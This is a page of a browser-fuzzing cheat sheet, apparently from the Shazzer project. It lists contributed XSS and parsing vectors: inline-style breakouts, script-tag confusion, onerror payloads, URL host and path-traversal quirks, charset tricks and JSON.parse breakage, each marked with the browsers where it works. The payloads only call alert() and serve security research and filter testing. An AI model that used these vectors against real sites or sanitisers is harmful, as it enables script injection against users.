Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 174 vectors with results

<div id="test" style="⟦00⟧onload="alert(1)">hello</div>

Source: Characters that can break out of an inline style with double quotes

Author: 0xdef1ant

XSSCSS ParsingChromeMicrosoft EdgeFirefox

Characters that can break out of an inline style with double quotes

3 browsers

Special characters:

NUL

Test in browser

<div id="test" style='0x00onload="alert(1)">hello</div>

Source: Characters that can break out of an inline style with single quotes

Author: 0xdef1ant

XSSCSS ParsingChromeFirefoxMicrosoft Edge

Characters that can break out of an inline style with single quotes

3 browsers

Special characters:

NUL

Test in browser

var targets=['"','\'','<','/','>','\\']0x0D
if (targets.includes('0x00'.toUpperCase())) {0x0D
    alert(0+' (normal) (0x00 -> '+"0x00".toUpperCase()+')')0x0D
}0x0D
0x0D
if (targets.includes('0x00'.toLocaleUpperCase())) {0x0D
    alert(0+' (locale) (0x00 -> '+"0x00".toLocaleUpperCase()+')')0x0D
}

Source: ToUpperCase Improper Character Morphing

Author: IDKdir

JSJavaScript SyntaxChromeFirefoxMicrosoft Edge

Checks for any special characters which are converted to something else when uppercased.

3 browsers

Special characters:

CRNUL

Test in browser

<div id="test" style="background-image: url(⟦00⟧;width:100%">hello</div>

Source: Characters that can break out of an inline style background-image url

Author: 0xdef1ant

XSSURL HandlingChromeMicrosoft EdgeFirefox

Characters that can break out of an inline style background-image url

3 browsers

Special characters:

NUL

Test in browser

if (new URL('https://www.example.com/0x00evil.com').host=='evil.com') {0x0D
    alert('"https://www.example.com/0x00evil.com" -> "evil.com"')0x0D
}0x0D
0x0D
if (new URL('https://www.example.com0x00evil.com').host=='evil.com') {0x0D
    alert('"https://www.example.com0x00evil.com" -> "evil.com"')0x0D
}

Source: Host

Author: IDKdir

JSURL HandlingChromeMicrosoft EdgeFirefox

Testing

3 browsers

Special characters:

NULCR

Test in browser

<script>0x0D
x = "<!--<script>>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(62)>"></div>

Source: Fuzzing weird script behaviour after script text

Author: hackvertor

XSSHTML ParsingChromeFirefoxMicrosoft Edge

This demonstrates that Shazzer now allows you to fuzz script tags.

3 browsers

Special characters:

Test in browser

<script>0x0D
x = "<!--<script0x0C>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(12)>"></div>

Source: Fuzzing weird script behaviour after script text

Author: hackvertor

XSSHTML ParsingChromeFirefoxMicrosoft Edge

This demonstrates that Shazzer now allows you to fuzz script tags.

3 browsers

Special characters:

CRFF

Test in browser

<script>0x0D
x = "<!--<script >"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(32)>"></div>

Source: Fuzzing weird script behaviour after script text

Author: hackvertor

XSSHTML ParsingChromeFirefoxMicrosoft Edge

This demonstrates that Shazzer now allows you to fuzz script tags.

3 browsers

Special characters:

Test in browser

<script>0x0D
x = "<!--<script0x0D>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(13)>"></div>

Source: Fuzzing weird script behaviour after script text

Author: hackvertor

XSSHTML ParsingChromeFirefoxMicrosoft Edge

This demonstrates that Shazzer now allows you to fuzz script tags.

3 browsers

Special characters:

Test in browser

<script>0x0D
x = "<!--<script/>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(47)>"></div>

Source: Fuzzing weird script behaviour after script text

Author: hackvertor

XSSHTML ParsingChromeFirefoxMicrosoft Edge

This demonstrates that Shazzer now allows you to fuzz script tags.

3 browsers

Special characters:

Test in browser

let img = document.createElement('img');0x0D
img.src = 'data:';0x0D
img.setAttribute('\onerror','alert(92)')0x0D
document.body.append(img);

Source: Characters allowed before event in attribute name using setAttribute

Author: hackvertor

JSDOM BehaviorChromeFirefoxSafariMicrosoft Edge

This vector shows which characters are allowed before an event name when using setAttribute.

4 browsers

Special characters:

Test in browser

new URL("https://x.se/long/..0x09/a").pathname.length > 4 ?  false : alert(9)

Source: Characters allowed in path traversal

Author: joaxcar

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

Check which characters are allowed inside a path traversal and the URL still traverses

4 browsers

Special characters:

TAB

Test in browser

new URL("https://x.se/long/..#/a").pathname.length > 4 ?  false : alert(35)

Source: Characters allowed in path traversal

Author: joaxcar

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

Check which characters are allowed inside a path traversal and the URL still traverses

4 browsers

Test in browser

new URL("https://x.se/long/..//a").pathname.length > 4 ?  false : alert(47)

Source: Characters allowed in path traversal

Author: joaxcar

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

Check which characters are allowed inside a path traversal and the URL still traverses

4 browsers

Test in browser

new URL("https://x.se/long/..?/a").pathname.length > 4 ?  false : alert(63)

Source: Characters allowed in path traversal

Author: joaxcar

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

Check which characters are allowed inside a path traversal and the URL still traverses

4 browsers

Test in browser

new URL("https://x.se/long/..\/a").pathname.length > 4 ?  false : alert(92)

Source: Characters allowed in path traversal

Author: joaxcar

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

Check which characters are allowed inside a path traversal and the URL still traverses

4 browsers

Test in browser

b1 = Math.floor(i / 256);0x0D
b2 = i % 256;0x0D
c = d.decode(new Uint8Array([0x1b, 0x24, 0x40, b1, b2])) 0x0D
if (c.split("").map((c) => c.charCodeAt(0)).some((i) => i < 127)) alert(i)

Source: JIS X 0208 bytes that produce ASCII characters

Author: JorianWoltjer

JSCharacter EncodingChromeMicrosoft EdgeFirefox

Sequences of two bytes that when in the ISO-2022-JP charset and preceded by the JIS X 0201 1978 escape sequence, produce any ASCII character after decoding.

3 browsers

Special characters:

Test in browser

<a href="https://0x00.example.com/" id="test0"></a>

Source: Chars allowed before domain

Author: t0xodile

XSSURL HandlingChromeMicrosoft EdgeFirefox

Checks which characters are allowed before a domain name.

3 browsers

Special characters:

NUL

Test in browser

anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(0) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(0)

Source: domain values

Author: nu11secur1ty

JSURL HandlingChromeMicrosoft EdgeFirefox

domain values

3 browsers

Special characters:

Test in browser

<img src=>{"[alert]"}<img/src/onerror=alert(1)>

Source: work

Author: nu11secur1ty

HTMLHTML ParsingChromeMicrosoft EdgeFirefox

work

3 browsers

Test in browser

let chr = String.fromCodePoint(33);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(33)

Source: Differences between escape vs encodeURIComponent

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge

This vector shows the differences between escape and encodeURIComponent

4 browsers

Special characters:

Test in browser

let chr = String.fromCodePoint(43);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(43)

Source: Differences between escape vs encodeURIComponent

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge

This vector shows the differences between escape and encodeURIComponent

4 browsers

Special characters:

Test in browser

let chr = String.fromCodePoint(47);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(47)

Source: Differences between escape vs encodeURIComponent

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge

This vector shows the differences between escape and encodeURIComponent

4 browsers

Special characters:

Test in browser

let chr = String.fromCodePoint(64);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(64)

Source: Differences between escape vs encodeURIComponent

Author: hackvertor

JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge

This vector shows the differences between escape and encodeURIComponent

4 browsers

Special characters:

Test in browser

<script>"\\"-alert(92)//"</script>

Source: Characters that cause the backslash to be consumed with a big5 charset

Author: hackvertor

XSSCharacter EncodingChromeFirefoxSafariMicrosoft Edge

This vector demonstrates that certain characters consume backslashes when using a big5 charset

4 browsers

Test in browser

<<script><notfound></script>

Source: Characters that can be between < and script>

Author: m10x

HTMLHTML ParsingFirefoxChromeMicrosoft Edge

Many blacklists do not allow < to be followed by a letter

3 browsers

Test in browser

try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(0))) { 0x0D
        JSON.parse(`{"test":"0x00"}`);0x0D
    }0x0D
} catch {0x0D
    alert(0);0x0D
}0x0D

Source: Non-standard characters that break JSON.parse()

Author: DreyAnd

JSXSS ExecutionChromeSafariMicrosoft EdgeFirefox

Characters that will break a JSON.parse() that do not include chars within standard JSON-format.

4 browsers

Special characters:

CRNUL

Test in browser

try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(1))) { 0x0D
        JSON.parse(`{"test":"0x01"}`);0x0D
    }0x0D
} catch {0x0D
    alert(1);0x0D
}0x0D

Source: Non-standard characters that break JSON.parse()

Author: DreyAnd

JSXSS ExecutionChromeSafariMicrosoft EdgeFirefox

Characters that will break a JSON.parse() that do not include chars within standard JSON-format.

4 browsers

Special characters:

CRSOH

Test in browser

try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(2))) { 0x0D
        JSON.parse(`{"test":"0x02"}`);0x0D
    }0x0D
} catch {0x0D
    alert(2);0x0D
}0x0D

Source: Non-standard characters that break JSON.parse()

Author: DreyAnd

JSXSS ExecutionChromeSafariMicrosoft EdgeFirefox

Characters that will break a JSON.parse() that do not include chars within standard JSON-format.

4 browsers

Special characters:

CRSTX

Test in browser

try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(3))) { 0x0D
        JSON.parse(`{"test":"0x03"}`);0x0D
    }0x0D
} catch {0x0D
    alert(3);0x0D
}0x0D

Source: Non-standard characters that break JSON.parse()

Author: DreyAnd

JSXSS ExecutionChromeSafariMicrosoft EdgeFirefox

Characters that will break a JSON.parse() that do not include chars within standard JSON-format.

4 browsers

Special characters:

CRETX

Test in browser

try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(4))) { 0x0D
        JSON.parse(`{"test":"0x04"}`);0x0D
    }0x0D
} catch {0x0D
    alert(4);0x0D
}0x0D

Source: Non-standard characters that break JSON.parse()

Author: DreyAnd

JSXSS ExecutionChromeSafariMicrosoft EdgeFirefox

Characters that will break a JSON.parse() that do not include chars within standard JSON-format.

4 browsers

Special characters:

CREOT

Test in browser

Page 7 of 9

« Prev Next »

var targets=['"','\'','<','/','>','\\']0x0D if (targets.includes('0x00'.toUpperCase())) {0x0D alert(0+' (normal) (0x00 -> '+"0x00".toUpperCase()+')')0x0D }0x0D 0x0D if (targets.includes('0x00'.toLocaleUpperCase())) {0x0D alert(0+' (locale) (0x00 -> '+"0x00".toLocaleUpperCase()+')')0x0D }

if (new URL('https://www.example.com/0x00evil.com').host=='evil.com') {0x0D alert('"https://www.example.com/0x00evil.com" -> "evil.com"')0x0D }0x0D 0x0D if (new URL('https://www.example.com0x00evil.com').host=='evil.com') {0x0D alert('"https://www.example.com0x00evil.com" -> "evil.com"')0x0D }

try {0x0D standard_chars = [0x0D `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D ];0x0D 0x0D if (!standard_chars.includes(String.fromCodePoint(0))) { 0x0D JSON.parse(`{"test":"0x00"}`);0x0D }0x0D } catch {0x0D alert(0);0x0D }0x0D

try {0x0D standard_chars = [0x0D `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D ];0x0D 0x0D if (!standard_chars.includes(String.fromCodePoint(1))) { 0x0D JSON.parse(`{"test":"0x01"}`);0x0D }0x0D } catch {0x0D alert(1);0x0D }0x0D

try {0x0D standard_chars = [0x0D `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D ];0x0D 0x0D if (!standard_chars.includes(String.fromCodePoint(2))) { 0x0D JSON.parse(`{"test":"0x02"}`);0x0D }0x0D } catch {0x0D alert(2);0x0D }0x0D

try {0x0D standard_chars = [0x0D `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D ];0x0D 0x0D if (!standard_chars.includes(String.fromCodePoint(3))) { 0x0D JSON.parse(`{"test":"0x03"}`);0x0D }0x0D } catch {0x0D alert(3);0x0D }0x0D

try {0x0D standard_chars = [0x0D `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D ];0x0D 0x0D if (!standard_chars.includes(String.fromCodePoint(4))) { 0x0D JSON.parse(`{"test":"0x04"}`);0x0D }0x0D } catch {0x0D alert(4);0x0D }0x0D

Cheat Sheet

Distributed Fuzzing

Cheat Sheet